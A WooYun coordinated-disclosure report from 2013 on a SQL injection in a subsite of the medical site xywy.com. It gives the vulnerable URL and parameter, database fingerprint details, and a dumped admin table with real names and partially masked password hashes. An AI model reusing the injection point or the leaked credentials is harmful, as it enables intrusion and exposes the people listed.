当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032416

漏洞标题:寻医问药某分站存在SQL注入漏洞

相关厂商:寻医问药

漏洞作者: 猪猪侠

提交时间:2013-07-26 15:30

修复时间:2013-09-09 15:31

公开时间:2013-09-09 15:31

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-26: 细节已通知厂商并且等待厂商处理中
2013-07-27: 厂商已经确认,细节仅向厂商公开
2013-08-06: 细节向核心白帽子及相关领域专家公开
2013-08-16: 细节向普通白帽子公开
2013-08-26: 细节向实习白帽子公开
2013-09-09: 细节向公众公开

简要描述:

某分站存在SQL注入漏洞,可直接爆出管理员信息

详细说明:

注入点:
http://z.xywy.com/doc/plus.php?type=appoint&noregist=1&eid=153478
注入信息:

Host IP:		121.11.92.162
Web Server: 	nginx
DB Server: 	MySQL >=5
Resp. Time(avg):	195 ms
Current User: 	fzread@192.168.0.11
Sql Version: 	5.0.92-log
Current DB: 	expert
System User: 	fzread@192.168.0.11
Host Name: 	fenzhen-db
Installation dir: 	/usr/local/mysql-5.0.92/
DB User: 	'fzread'@'192.168.0.11'
Data Bases: 	information_schema
		expert
		test

漏洞证明:

admin_user_id	admin_group_id	username	passwd	name	createtime	memo	type
1	1	zhouhl125827	74f358****170c802135	李为为	2013-03-07 17:54:29		0
4	4	zhuanj	670b1472****9902aecba	专家	2012-10-09 10:27:26		0
5	1	zzq	ae64520acc****7eb9af	张志强	2012-03-01 14:14:19		0
23	2	mubei	7af0bc89****774f0967	穆蓓	2012-03-01 16:01:00		0
25	1	wangyun	e3ceb58****1fdaad01	王云	2012-10-09 14:58:28		0
27	16	zhangfuhua	e10adc3****a59abbe56	张富华	2013-05-30 11:06:42		0
38	1	likunsheng		李坤省	2012-10-09 10:29:56		0
62	5	穆蓓	e10adc394****9abbe56	穆蓓	2012-05-22 11:11:49		0
84	9	yqlj	e10adc394****59abbe56	友情链接	2012-09-11 10:21:50		0
92	1	liuh	332935698****b0e48ee	刘绘	2012-06-13 11:15:47		0
94	1	wangshaoping	15bc9e*******349abbc	王少平	2013-07-24 11:18:07		0

修复方案:

# 客户端传入参数强制类型转换

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-07-27 09:27

厂商回复:

感谢 已提交BUG

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-26 18:19 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    白发了。目测忽略。。

  2. 2013-07-26 20:49 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    - -dedecms?